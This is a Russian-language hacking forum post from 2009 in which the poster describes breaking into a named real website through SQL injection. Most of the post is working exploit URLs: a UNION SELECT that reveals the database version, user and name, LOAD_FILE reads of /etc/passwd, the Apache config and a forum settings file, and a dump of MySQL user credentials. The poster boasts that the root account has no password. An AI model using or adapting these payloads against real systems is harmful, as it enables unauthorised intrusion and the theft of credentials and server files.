Показать сообщение отдельно

  #6  
Старый 09.02.2009, 19:58
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
С нами: 9314306

Репутация: 325
По умолчанию

kusa.ca PR5
Код:
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13/*
DBVer:4.1.20
User: root@localhost << Вот это я вообще не ожидал увидить, но это ладно! =) самое интересное еще впереди!!
DBName:desar01_cms

Работает чтение файлов...
/etc/passwd
Код:
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('etc/passwd'),5,6,7,8,9,10,11,12,13/*
/etc/httpd/conf/httpd.conf(от сюда видно, что кроме уязвимого есть на этом сервере еще несколько сайтов)
Код:
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('etc/httpd/conf/httpd.conf'),5,6,7,8,9,10,11,12,13/*
Теперь посмотрим что за пользователи...
Код:
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12,13+FROM+mysql.user/*
И тут оказывается что на root вообще нет пароля =))) Этому я нашел подтверждение, прочитав конфиг от местного форума:
Код:
http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('/var/www/vs/forums.kusa.ca/Settings.php'),5,6,7,8,9,10,11,12,13/*
=)
 
Ответить с цитированием